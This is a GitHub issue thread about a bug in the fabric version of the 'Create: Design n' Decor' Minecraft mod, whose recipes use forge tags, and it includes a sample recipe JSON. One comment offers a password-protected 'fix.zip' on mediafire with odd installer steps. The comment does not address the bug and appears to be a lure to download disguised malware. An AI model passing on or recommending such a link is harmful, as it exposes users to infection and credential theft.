Create: Design n' Decor [ARCHIVED] "new update soon"

Create: Design n' Decor [ARCHIVED] "new update soon"

5M Downloads

Recipe bug for fabric version of mod

IamGallito opened this issue ยท 3 comments

commented

as title says theres an issue with recipes being bugged for the fabric version due to forge tags.
2024-08-26_12 39 51

commented

to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

commented

can confirm, half the recipies use the forge tag system

one of the many offending recipes, extracted from the FABRIC version

will make a commit to fix it one I get out of work

  "type": "minecraft:stonecutting",
  "ingredient": {
    "tag": "forge:storage_blocks/brass"
  },
  "result": "design_decor:brass_boiler",
  "count": 4
}```
commented

Can I 1up this? How has this not been fixed? It seems like such a simple fix!